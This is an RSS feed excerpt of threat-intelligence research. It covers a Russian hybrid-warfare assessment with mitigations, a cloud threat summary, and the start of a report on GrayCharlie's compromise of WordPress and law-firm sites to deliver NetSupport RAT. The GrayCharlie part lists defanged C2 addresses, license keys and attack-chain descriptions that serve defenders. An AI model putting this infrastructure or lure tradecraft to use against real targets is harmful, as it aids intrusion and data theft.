        <p>Beginning in September 2025, suspected violations of NATO airspace by Russia-directed drone operators or Russian jets increased to unprecedented levels, as Russia likely sought to project power across NATO territory and test NATO resolve while maintaining plausible deniability. Insikt Group tracked 30 suspected or confirmed violations between September 2025 and January 2026, compared to 23 suspected or confirmed violations between March 2022 and August 2025. The most commonly targeted countries since March 2022 have been Poland and Romania; however, suspected Russian violations of NATO airspace have occurred outside of Russia’s historic sphere of influence, including in Germany, UK, Denmark and Norway. Violations have most frequently targeted critical infrastructure, such as military bases and airports.</p>
        <p>In a full-scale New Generation Warfare-like campaign in Europe, Russia likely would escalate the frequency and level of aggressiveness of these violations. Russia’s targeting would likely continue to focus on critical infrastructure, but violations would very likely significantly increase in frequency. Russia would also likely use drones to fly closer to targets and perhaps hover over them for extended periods of time, in a likely effort to test NATO’s willingness to shoot down drones and perhaps collect intelligence on critical infrastructure facilities. Indeed, in September 2025, Polish authorities said they <a href="https://www.bbc.com/news/articles/c147065pzdzo">shot</a> down Russian drones that violated Poland’s airspace.</p>
        <p>Other ways Russia would likely escalate the aggressiveness of its airspace violations include timing those violations with major NATO events, such as military exercises and summits. Russia could escalate its use of drones as electronic warfare mechanisms, perhaps to disrupt NATO military exercises or the functioning of critical infrastructure facilities.</p>
        <p>Russia would likely also use its drones to amplify its psychological warfare as a way of projecting power and demonstrating to the public that Moscow can disrupt everyday life in NATO countries. Russia could do this via tactics such as hovering drones over civilian transportation infrastructure, like railways or airports, which have already been <a href="https://www.cbsnews.com/news/drones-europe-nato-airports-russia-hybrid-warfare-belgium-uk-anti-drone-troops/">forced</a> to temporarily close. Russia could also launch drones over facilities hosting political summits, such as the annual NATO Summit, or over polling places during elections to stoke public fear. In a full-scale NGW campaign that involves coordination of multiple tactics, Russian propaganda outlets might release footage of these incidents to propagate a narrative that NATO states cannot protect their infrastructure. Russia could also combine drone or jet violations with sabotage operations to further sow public panic and force NATO governments into a defensive posture.</p>
        <p>Russia would very likely seek to maintain some level of deniability and would avoid airstrikes and mass casualty events, which would almost certainly guarantee an Article 5 declaration.</p>
        <h3>Territorial Waters Violations and Targeting of Undersea Cables</h3>
        <p>Insikt Group assesses that, since February 2022, Russia has increasingly used violations of NATO states’ territorial waters<sup>4</sup> and targeting of undersea cables to test the alliance’s resilience, collect intelligence, keep NATO in a reactive, defensive posture, and attempt to deter NATO from undermining Russian strategic interests. In June 2023, Deputy Chairman of the Security Council Dmitriy Medvedev <a href="https://www.reuters.com/world/europe/russias-medvedev-says-moscow-now-has-free-hand-destroy-enemies-undersea-2023-06-14/">stated</a> that, “if we proceed from the proven complicity of Western countries in blowing up the Nord Streams, then we have no constraints — even moral — left to prevent us from destroying the ocean-floor cable communications of our enemies.” Medvedev’s comments were likely purposefully hyperbolic; however, they likely reflect a Kremlin perception that NATO is targeting Russian strategic interests, thereby justifying retaliatory action.</p>
        <p>Examples of Russia likely targeting undersea cables and maritime assets include an April 2025 incident in which the UK <a href="https://www.thetimes.com/uk/defence/article/russia-secret-war-uk-waters-submarines-dpbzphfx5">identified</a> Russian sensors attempting to collect intelligence on UK nuclear submarines and other underwater critical infrastructure; the Russian Yantar surveillance ship <a href="https://www.theguardian.com/world/2024/nov/16/russian-spy-ship-escorted-away-from-internet-cables-in-irish-sea">sailing</a> near cables carrying data for Google and Microsoft under the Irish Sea in November 2024; and reports suggesting that the Russian Eagle S ship accused of damaging multiple undersea cables in December 2024 <a href="https://www.lloydslist.com/LL1151955/Russia-linked-cable-cutting-tanker-seized-by-Finland-was-loaded-with-spying-equipment">carried</a> spy equipment to monitor naval activity.</p>
        <p>Russian ships have also violated NATO states’ territorial waters, likely to test NATO resilience, force NATO into a defensive posture, and project power. Examples include a July 2025 incident in which a Russian border guard vessel <a href="https://news.err.ee/1609755954/russian-border-guard-vessel-violates-estonia-s-maritime-border">entered</a> Estonian territorial waters without permission; a July 2024 incident in which a Russian naval vessel <a href="https://www.rferl.org/a/finland-russia-vessel-border-guard-territorial-waters/33052301.html?utm_source=chatgpt.com">entered</a> Finnish territorial waters without authorization; and frequent <a href="https://apnews.com/article/nato-russia-shadow-fleet-jets-ukraine-sanctions-oil-revenue-5e74109e5b1d84dc73ac2592068d4689">encounters</a> between NATO states and Russia-linked “shadow fleet” vessels. These vessels are tankers sailing under other flags, which often refuse inspection or orders from local navies.</p>
        <p>During a full-scale New Generation Warfare campaign against NATO, Russia likely would escalate its targeting of undersea cables and violations of territorial waters. This could include more frequent cable targeting, likely to cause minor but persistent damage to undersea critical infrastructure that tests NATO resilience and Russian destructive capabilities without provoking an Article 5 declaration. Russia could also conduct electronic jamming operations during cable repairs to inhibit communications and use Russian ships to harass those conducting repairs.</p>
        <p>Russia would also likely attempt longer and more provocative territorial waters violations, including placing Russian ships near NATO vessels and expanding these activities into areas such as the Mediterranean; conducting concurrent hybrid activity such as GPS jamming and automatic identification system (AIS) spoofing; refusing escort out of territorial waters; and combining territorial waters violations with airspace violations by Russian aircraft or targeting of undersea infrastructure.</p>
        <p>Russia would likely aim to overwhelm NATO’s existing efforts to prevent sabotage of undersea infrastructure. In January 2025, Allied Joint Force Command Brunssum (JFCBS) <a href="https://shape.nato.int/operations/operations-and-missions/baltic-sentry">launched</a> Baltic Sentry — a campaign that uses tools such as frigates, maritime patrol assets, and naval drones to deter sabotage of undersea infrastructure. Since the launch of Baltic Sentry, the Baltic Sea has <a href="https://www.atlanticcouncil.org/in-depth-research-reports/issue-brief/how-the-baltic-sea-nations-have-tackled-suspicious-cable-cuts/">experienced</a> very few undersea sabotage efforts; however, it is not clear whether this is the result of Baltic Sentry or a lack of planned operations.</p>
        <h3>Sabotage Operations</h3>
        <p>We assess Russia has escalated its use of sabotage operations in NATO territory since its full-scale invasion of Ukraine in 2022, likely to test the resilience particularly of NATO states’ critical infrastructure; propagate a narrative that Western states cannot protect their populations from threats; harm NATO’s ability to collectively respond to Russian aggression by forcing NATO into a reactive, defensive posture; and degrade NATO states’ ability to provide material support to Ukraine. Sabotage operations are loosely defined, but typically <a href="https://www.rferl.org/a/parcels-exploded-russian-plot/33189080.html">consist</a> of targeting <a href="https://apnews.com/article/lithuania-russia-intelligence-arson-attack-ikea-vilnius-b7f915c6376c0711b852657d17a30c0d">civilian</a> or dual-use <a href="https://foreignpolicy.com/2024/07/26/russia-sabotage-poison-finland-water-treatment/">infrastructure</a> with physical security attacks by deniable entities.</p>
        <p>Particularly since 2022, Russia-linked entities have focused sabotage operations on critical infrastructure in NATO states, exploiting vulnerabilities wrought from <a href="https://www.fme.nl/system/files/publicaties/2023-12/rapport%20infra%20maintenance%20EU%20%2B%20intro.pdf">deferred</a> maintenance and lack of sufficient public or private <a href="https://www.visualcapitalist.com/sp/charted-europes-2-trillion-infrastructure-investment-deficit-gxeu01/">investment</a> in upkeep. Within critical infrastructure, the most frequently <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">targeted</a> sectors include undersea telecommunication and power cables; water supply and distribution; transportation; military; healthcare; and telecommunications. The number of Russian sabotage operations has quadrupled from 2023 to 2024, and in 2025, it was likely at levels consistent with 2024. Operations have occurred across NATO, as opposed to being focused in Russia’s historic sphere of influence. That said, the most commonly <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">targeted</a> states between January 2018 and June 2025 were Germany, Estonia, Latvia, Lithuania, and Poland.</p>
        <p>In a New Generation Warfare-like campaign targeting NATO territory, Moscow would likely move from what we assess has thus far been largely opportunistic sabotage to operations with more consistency and geographic breadth, and that complement other tactics.</p>
        <p>Russia would likely still focus its sabotage operations on critical infrastructure, but would likely place a premium on damaging the critical infrastructure of NATO states that either would be probable targets of a Russian military incursion — such as Poland or the Baltic states — or would lend significant assistance to those states, such as the UK, Germany, or France. This is because in an NGW campaign, Russia would likely view sabotage operations as, in part, a way to test the resilience of potential victim states and their allies. Russia’s sabotage operations against those targets would likely be more frequent and could coincide with significant events such as elections or military exercises. Russia would likely pair sabotage operations with other tactics, such as offensive cyber operations or airspace violations, to augment the destructive impact of the operations and try to strain NATO states’ capacity by forcing them to respond to multiple disruptions at once, while still staying below the threshold that would risk an Article 5 declaration.</p>
        <h3>Offensive Cyber Operations for Disruption and Counterintelligence</h3>
        <p>Russian cyber activity directed at European targets has consistently emphasized access-oriented operations, including attacks on internet-facing firewalls, virtual private networks (VPNs), email services, and web portals. This activity aligns with documented Russian cyber practices focused on enabling intelligence collection, operational reach, and long-term flexibility rather than immediate disruptive effects. Recent Insikt Group reporting highlights BlueEcho activity targeting perimeter infrastructure to establish footholds and enable follow-on credential capture and lateral movement, while BlueDelta campaigns demonstrate sustained credential harvesting at scale using impersonated Microsoft Outlook Web App (OWA), Sophos VPN, and Google login workflows. This tradecraft is low-cost, repeatable, and consistent with long-term counterintelligence targeting of government, defense, and research entities.</p>
        <p>Russian cyber activity affecting Europe has been broad in scope, with targeting observed across <a href="https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting">multiple regions and sectors</a>. If cyber operations were used for more overtly disruptive purposes, effects would likely be more pronounced in states with weaker cybersecurity maturity or slower coordinated response mechanisms, such as fragmented local-government IT environments or limited national incident response surge capacity. This does not preclude activity against major NATO states, where Russian cyber operations have historically focused more heavily on intelligence collection and access. BlueDelta’s targeting of NATO-aligned and defense-related organizations reflects continued Russian interest in strategically valuable European targets aligned with GRU intelligence requirements.</p>
        <p>Observed Russian cyber activity also provides insight into how operations could escalate if strategic conditions were to change and Russia were to launch a full-scale NGW campaign. Russian threat actors have demonstrated the ability to establish and maintain access over time, including through persistent connections and tunneling, which could be repurposed to degrade remote access services, manipulate edge-device configurations, or cause temporary service disruption. In Ukraine, cyber activity has been observed alongside influence operations and physical sabotage, including Recorded Future–tracked influence campaigns such as <a href="https://www.recordedfuture.com/research/copycop-deepens-its-playbook-with-new-websites-and-targets">CopyCop</a>, which leveraged automated content replication and spoofed media infrastructure to amplify pro-Russian narratives in parallel with other forms of hybrid activity. If applied elsewhere, similar coordination could increase pressure on incident response capabilities and undermine public confidence in the reliability of essential services. Credential-harvesting operations further provide pathways beyond inbox access, including potential compromise of identity providers, VPN portals, and privileged administrative portals.</p>
        <p>Russian cyber operations have historically involved establishing and maintaining access to targeted networks over extended periods, a pattern also <a href="https://www.security.com/blog-post/ukraine-russia-attacks">documented</a> in prior campaigns in Ukraine. However, there is no public evidence demonstrating that the access currently observed in European networks is intended for future disruptive operations. If a kinetic conflict were to escalate in Europe, Russia would likely seek to expand or prioritize access within relevant networks to support intelligence collection, operational coordination, or potential disruption. Russia also has a <a href="https://www.recordedfuture.com/research/dark-covenant-3-controlled-impunity-and-russias-cybercriminals">documented</a> history of tolerating or leveraging cybercriminal activity alongside state-directed operations, including overlap with criminal infrastructure and access brokers, which may allow operators to expand scale, complicate attribution, and generate disruptive effects without overtly exposing state-linked capabilities. Collectively, activity associated with BlueAlpha, BlueDelta, BlueEcho, Sandworm, and Dragonfly illustrates Russia’s ability to scale cyber operations from access and intelligence collection toward disruption if strategic conditions were to change, consistent with broader hybrid and New Generation Warfare practices.</p>
        <h3>Exploitation of European Dependence on Russian Oil and Natural Gas</h3>
        <p>Russia has long exploited other states’ dependence on its natural gas and oil to exercise leverage over them, typically by strategically <a href="https://www.reuters.com/world/poland-bulgaria-face-russian-gas-cut-ukraine-crisis-escalates-2022-04-26/">decreasing</a> supply flows, particularly during high-demand periods, such as winter. For example, in 2006, Georgia <a href="https://www.rferl.org/a/1064976.html">accused</a> Russia of intentionally cutting gas supplies during an unusually cold period to increase political pressure on Tbilisi. In the run-up to Russia’s full-scale invasion of Ukraine in February 2022, Russian state gas company Gazprom <a href="https://www.reuters.com/world/europe/gazprom-cuts-gas-flows-europe-ukraine-tensions-2021-10-06/">reduced</a> natural gas deliveries to Europe, likely in an effort to pressure Europe into abandoning a unified stance on supporting Ukraine.</p>
        <p>Since 2022, many NATO states have sought to <a href="https://gasoutlook.com/analysis/europe-breaks-with-russian-gas-but-still-depends-on-the-u-s/">reduce</a> their dependence on Russian natural gas and oil; however, several states remain dependent, including <a href="https://pism.pl/publications/slovakia-remains-dependent-on-russian-energy">Slovakia, Hungary, and Türkiye</a>. In a full-scale New Generation Warfare campaign in Europe, Russia would very likely escalate its exploitation of those states’ dependence on Russian energy imports to demonstrate Moscow’s ability to degrade European critical infrastructure, undermine NATO unity, gauge the resilience of these states’ critical infrastructure, and test Russia’s ability to handicap critical infrastructure, should Putin decide to launch a military incursion into NATO territory.</p>
        <p>Moscow’s willingness to exploit these states’ dependence on Russian energy likely varies by state. Moscow is less likely to exploit Hungary’s dependence on Russian oil and gas, given Budapest’s <a href="https://www.bbc.com/news/articles/c058lny3pdqo">strong</a> relations with Russia. Slovakia is a more likely target, as it seeks a <a href="https://www.reuters.com/business/energy/slovakia-wants-normalise-relations-with-russia-ramping-up-gas-imports-pm-fico-2025-09-02/">positive</a> relationship with Moscow, but is likely of less strategic importance to Russia than Hungary. Moscow’s relations with Türkiye have <a href="https://carnegieendowment.org/research/2024/10/understanding-turkiyes-entanglement-with-russia">fluctuated</a> between positive and adversarial; the likelihood of exploiting Türkiye’s dependence on Russian energy imports would likely depend, in part, on how positive the overall Russia-Türkiye relationship is at that time.</p>
        <p>Escalation of economic critical infrastructure targeting would likely take the form of both more frequent and more geographically broad operations, particularly during high-demand periods such as the winter and perhaps during NATO military exercises or elections. Russia could also escalate its use of pricing manipulation to punish states that work against Russia’s strategic priorities in Ukraine, and reward pro-Russia states such as Hungary.</p>
        <p>Russia would also likely combine supply cuts with sabotage operations. For example, in 2006, Moscow <a href="https://www.reuters.com/article/world/georgia-hit-by-gas-cut-and-power-line-blast-idUSL08601420060122/">cut</a> gas supplies in Georgia at the same time it sabotaged an electricity line. Following a successful operation, pro-Russia propaganda outlets would likely amplify narratives that claim European critical infrastructure is weak and vulnerable, and that this demonstrates the inadequacy of democracy and the Western political system writ large at fulfilling basic public needs.</p>
        <p>In a New Generation Warfare campaign against Europe, Russia would be unlikely to seek permanent damage to European critical infrastructure or mass civilian harm from disruption of energy flows. Russia would also likely avoid long-term disruption of oil and gas deliveries to limit the financial impact, since oil and gas revenues <a href="https://www.reuters.com/business/energy/russias-oil-gas-budget-revenue-set-sink-46-january-reuters-calculations-show-2026-01-19/#:~:text=Summary,the%20same%20month%20in%202024.">comprise</a> roughly 25% of Russia’s annual federal revenue.</p>
        <h2>Indicators of NGW Campaign in Europe, Implications for Public and Private Sectors, and Recommended Mitigations</h2>
        <h3>Tactic: Influence Operations</h3>
        <h4>Indicators of NGW Campaign</h4>
        <ul>
          <li>Increased convergence of narratives across propaganda outlets, including state media, inauthentic social media accounts, and so on</li>
          <li>Parallel narratives tailored to each country or region</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public Sector:</strong> more pronounced political polarization; reduced public trust in government competence</li>
          <li><strong>Private Sector:</strong> brand damage if firms are targeted in influence operation (IO) campaigns; employee or executive harassment or doxxing</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Ensure communication response protocols are in place, such as rapid rebuttal measures</li>
          <li>Ensure information environment monitoring is attuned to Russia-nexus narratives so inauthentic behavior can be detected quickly</li>
        </ul>
        <h3>Tactic: Airspace Incursions by Drones and Jets</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent incursions that last longer and target strategic sites such as military training grounds, critical infrastructure nodes, and so on</li>
          <li>Incursions are conducted at lower altitudes, with transponders turned off</li>
          <li>Violations are clustered around NATO decisions or major military exercises</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> forced closures of critical infrastructure sites during airspace violations, thereby disrupting operations, as well as likely escalation of public alarm and potential decrease in public confidence in the government’s ability to keep critical infrastructure safe</li>
          <li><strong>Private:</strong> business operation disruptions due to critical infrastructure closures</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Strengthen counter-measures against unmanned aircraft systems (UASs) around critical sites</li>
          <li>Ensure joint civil-military air incident protocols are in place, including aviation alerts and Notice to Airmen (NOTAM) coordination</li>
          <li>Improve GPS resilience</li>
        </ul>
        <h3>Tactic: Territorial Waters Violations and Targeting of Undersea Cables</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent territorial waters violations</li>
          <li>Violations by state-linked vessels</li>
          <li>Non-compliance with escort or hails; risky maneuvering around NATO state vessels, perhaps to provoke potential collisions</li>
          <li>Increased loitering of suspicious vessels near cable routes and landing areas</li>
          <li>Repeated “anchor drag” incidents</li>
          <li>Interference with repair ships</li>
          <li>Simultaneous cyber activity against telecommunications and energy operators</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> intermittent communications degradation; potential harm to energy infrastructure</li>
          <li><strong>Private:</strong> major potential operational losses for telecommunications, finance, and other key sectors; potential increases in insurance costs for shipping companies, should territorial waters violations at ports become common</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Consider mapping alternative sea routes in case primary routes are disrupted; consider rapid reroute contracts</li>
          <li>Ensure sufficient port and state coordination</li>
          <li>Ensure physical hardening at cable landing sites</li>
          <li>Expand Baltic Sentry efforts to other locations</li>
        </ul>
        <h3>Tactic: Sabotage Operations</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent operations, including arson, vandalism, explosions, and rail disruptions</li>
          <li>Targeting of high-priority sites, such as military logistics hubs, defense suppliers, and so on</li>
          <li>Targeting of civilian sites, such as shopping malls or residential neighborhoods</li>
          <li>Concurrent operations in multiple geographic regions, suggesting intentional planning</li>
          <li>Combined sabotage operations and airspace or territorial waters violations</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> potential reduction in public confidence in government’s ability to protect critical infrastructure and residential areas; in the event of significant escalation in sabotage operations, emergency services could be strained</li>
          <li><strong>Private:</strong> facility damage or loss; threat to worker safety; supply chain interruption; business interruption; reputational liability</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Expand insider threat and contractor vetting at critical infrastructure sites</li>
          <li>Ensure physical security measures are in place, including perimeter detection, anti-drone measures, camera coverage, and access control</li>
          <li>Enhance public-private partnerships, as most of the critical infrastructure NATO relies upon is commercially owned</li>
          <li>Ensure rapid liaison channels with law enforcement and intelligence services</li>
        </ul>
        <h3>Tactic: Offensive Cyber Operations</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>Campaigns that target strategic pressure points, such as logistics and transportation hubs, defense supply chains, and local government entities</li>
          <li>Intrusion and distributed denial-of-service (DDoS) activity spikes at politically significant moments, including elections, military exercises, or geopolitical summits</li>
          <li>Campaigns that blend state and proxy activity, such as hacktivist DDoS campaigns that amplify Kremlin-aligned narratives</li>
          <li>Coupling of multiple tactics, such as cyber and influence operation hybrid campaigns</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> DDoS and ransomware campaigns can undermine public confidence in the reliability of institutions; compromise of government narratives can result in less public confidence in the truth of government messaging; even attempted election manipulation can reduce confidence in voting systems</li>
          <li><strong>Private:</strong> elevated risk of disruption of key logistics, transport, rail, and aviation systems; hack and leak operations pose risk to reputation, personally identifiable information, and intellectual property rights; targeting of critical infrastructure can result in operational disruption</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Enforce phishing-resistant multi-factor authentication</li>
          <li>Implement conditional network access based on geopolitical and risk factors</li>
          <li>Patch for commonly exploited software</li>
          <li>Reduce exposure (lock down admin portals; restrict by IP address; remove unused services)</li>
          <li>Use DDoS protection, autoscaling</li>
          <li>Coordinate with the national computer emergency response team (CERT) and National Counterintelligence and Security Center (NCSC), as well as upstream providers; rehearse continuity plans</li>
          <li>Require multi-factor authentication (MFA) and logging parity from third-party providers; segment privileged access; monitor for abnormal remote management activity</li>
        </ul>
        <h3>Tactic: Leveraging Economic Dependence</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>Supply manipulation, including threats or actions to raise price volatility</li>
          <li>Exploitation of legal measures, including sudden contract disputes or claims of force majeure</li>
          <li>More frequent cessation of oil and gas supplies, especially during high-demand periods such as winter</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> higher energy bills and supply disruption, potentially leading to public dissatisfaction</li>
          <li><strong>Private:</strong> price shocks, supply uncertainty, costs related to resolving alleged contract disputes</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Diversify suppliers and routes</li>
          <li>Ensure on-site backup generation where feasible</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_17cedbb65db54e421fed3abc0cc62f5ed6f6fa0aa.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[2025 Cloud Threat Hunting and Defense Landscape]]></title>
            <link>https://www.recordedfuture.com/research/2025-cloud-threat-hunting-defense-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/2025-cloud-threat-hunting-defense-landscape</guid>
            <pubDate>Thu, 19 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat actors are doubling down on cloud infrastructure — exploiting misconfigurations, abusing native services, and pivoting through hybrid environments to maximize impact. See how attack patterns are evolving across exploitation, ransomware, credential abuse, and AI service targeting in this latest cloud threat roundup.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:</p>
        <ul>
          <li>Exploitation and Misconfiguration</li>
          <li>Cloud Abuse</li>
          <li>Cloud Ransomware</li>
          <li>Credential Abuse, Account Takeover, and Unauthorized Access</li>
          <li>Third-Party Compromise</li>
        </ul>
        <p>Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateways, and enterprise resource planning (ERP) platforms — as well as stolen or weakly governed credentials sourced from public leaks, compromised developer workstations, and socially engineered helpdesk workflows. Once inside a targeted environment, threat actors systematically pivot through hybrid identity and virtual private network (VPN) infrastructure, targeting directory-synchronized accounts, non-human and executive identities, and privileged cloud roles to gain tenant-wide administrative control.</p>
        <p>Post-compromise activity is characterized by heavy use of built-in cloud and SaaS functionality: enumerating and exfiltrating data via native storage and backup services, destroying or encrypting cloud backups and snapshots for impact, manipulating static frontends and continuous integration/continuous deployment (CI/CD) pipelines to subvert trust in applications and repositories, and using mainstream platforms such as calendar services as covert command-and-control (C2) channels.</p>
        <p>In comparison to its previous <a href="https://www.recordedfuture.com/research/cloud-threat-hunting-defense-landscape">iteration</a>, the majority of the events discussed in this report indicate that threat actors are engaging in similar threat behaviors; however, there are three specific trends that appear to have emerged since the most recent iteration:</p>
        <ul>
          <li>Cloud threat actors are registering their own legitimate cloud resources for use in attack chains.</li>
          <li>DDOS attacks are becoming less effective when targeting cloud environments, even in instances of record-breaking throughput, due to increased cloud-native capabilities for mitigating these threats.</li>
          <li>Cloud threat actors are increasingly diversifying the types of services that they target in victim environments during an attack chain, with a notable focus on LLM and other AI-powered services hosted in cloud environments.</li>
        </ul>
        <p>The trends associated with abuse indicate a shift in threat actor perception, demonstrating that threat actors are exploring the broader benefits that compromised cloud services can provide.</p>
        <p><strong><a href="https://assets.recordedfuture.com/Executive-Insights/CTA-20260219_Cloud_Threat_Landscape_Exec_Report.pdf">Download Cloud Threat Landscape: Executive Insights</a></strong></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1dd2d1174c3e28d579004a1fe4f44c24107a72547.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GrayCharlie Hijacks Law Firm Sites in Suspected Supply-Chain Attack]]></title>
            <link>https://www.recordedfuture.com/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack</guid>
            <pubDate>Wed, 18 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[GrayCharlie turns compromised WordPress sites into malware delivery machines. Discover how this threat actor chains fake browser updates and ClickFix lures to deploy NetSupport RAT, Stealc, and SectopRAT.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has been monitoring GrayCharlie, a threat actor overlapping with SmartApeSG and active since mid-2023, for some time, and is now publishing its first report on the group. GrayCharlie compromises WordPress sites and injects them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms. These infections often progress to the deployment of Stealc and SectopRAT. Insikt Group identified a large amount of infrastructure linked to GrayCharlie, primarily tied to MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, both actor-controlled and compromised staging infrastructure, and higher-tier infrastructure used to administer operations. While most compromised websites appear to be opportunistic and span numerous industries, Insikt Group identified a cluster of United States (US) law firm sites that were likely compromised around November 2025, possibly through a supply-chain compromise involving a shared IT provider.</p>
        <p>To protect against GrayCharlie, security defenders should block IP addresses and domains tied to associated remote access trojans (RATs) and infostealers, flag and potentially block connections to compromised websites, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the <strong>Mitigations</strong> section of this report for implementation guidance and <strong>Appendix A</strong> for a complete list of indicators of compromise (IoCs).</p>
        <h2>Key Findings</h2>
        <ul>
          <li>GrayCharlie, which overlaps with SmartApeSG and first emerged in mid-2023, is a threat actor that injects links to externally hosted JavaScript into compromised WordPress sites. These links redirect victims to NetSupport RAT infections delivered via fake browser update pages or ClickFix techniques, ultimately resulting in Stealc and SectopRAT infections.</li>
          <li>Insikt Group identified a wide range of GrayCharlie infrastructure, largely associated with MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, staging infrastructure made up of both actor-controlled and compromised infrastructure, as well as components of GrayCharlie’s higher-tier infrastructure used to manage its operations.</li>
          <li>Insikt Group identified two primary attack chains associated with GrayCharlie: one in which victims encounter fake browser update pages after visiting compromised websites, and another in which they are presented with a ClickFix pop-up, a technique that has become increasingly common in 2025.</li>
        </ul>
        <h2>Background</h2>
        <p>GrayCharlie is Insikt Group’s designation for a threat activity group that first appeared in mid-2023 and is behind SmartApeSG, also referred to as ZPHP or HANEYMANEY. The group’s operations typically involve injecting malicious JavaScript into legitimate but compromised WordPress sites. Visitors to these sites are shown convincing, browser-specific fake update prompts (such as for Chrome, Edge, or Firefox) that encourage them to download what appears to be an update but is actually malware.</p>
        <p>In late March or early April 2025, SmartApeSG <a href="https://www.malware-traffic-analysis.net/2025/06/18/index.html">shifted</a> from using fake browser updates to deploying ClickFix lures, mirroring a broader trend among threat actors of increasingly adopting ClickFix.</p>
        <p>GrayCharlie predominantly delivers NetSupport RAT; however, deployments of Stealc and, more recently, SectopRAT, have been observed in rare instances. The group’s ultimate objectives remain uncertain. Current evidence suggests a focus on data theft and financial gain, with a theoretical, but unsubstantiated, possibility that it may sell or transfer access to other threat actors.</p>
        <h2>Threat Analysis</h2>
        <p>Insikt Group has been tracking GrayCharlie for an extended period and has observed the actor’s persistent behavior since its emergence in 2023. GrayCharlie continues to conduct the same types of operations, regularly deploying large volumes of new infrastructure and adhering to consistent tactics, techniques, and procedures (TTPs), including continued use of the same infection chains and NetSupport RAT payloads. The group targets organizations worldwide, with a particular focus on the US. The following sections provide a detailed examination of GrayCharlie’s operational infrastructure and its two primary attack chains.</p>
        <h3>Infrastructure Analysis</h3>
        <h4>NetSupport RAT Clusters</h4>
        <p>Insikt Group identified two main NetSupport RAT clusters linked to GrayCharlie based on factors such as TLS certificates, NetSupport serial numbers and license keys, and the timing of the activity (see <strong>Figure 1</strong>). In addition, Insikt Group identified a range of other NetSupport RAT C2 servers linked to GrayCharlie activity, but which are not currently attributed to either of the two main clusters. Insikt Group assesses that these clusters may correspond either to different individuals associated with GrayCharlie or to distinct GrayCharlie campaigns. The clusters are further described below.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_14fd6cf6079b29690c9ef99e5ec9308e54ce5364d.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="618" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Overview of GrayCharlie clusters observed in 2025 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h5>Cluster 1</h5>
        <p>Cluster 1 comprises NetSupport RAT C2 servers whose TLS certificates display a recurring monthly naming pattern. All servers in this cluster are hosted by MivoCloud and were deployed between March and August 2025. Notably, NetSupport RAT samples associated with the cluster’s March and April infrastructure used the license key <code>DCVTTTUUEEW23</code> and serial number <code>NSM896597</code>, before shifting to the license key <code>EVALUSION</code> and serial number <code>NSM165348</code> in subsequent deployments. The C2 servers associated with this cluster are listed in <strong>Table 1</strong>.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>194[.]180[.]191[.]51</div>
            <div>mar5</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]168</div>
            <div>mar4</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
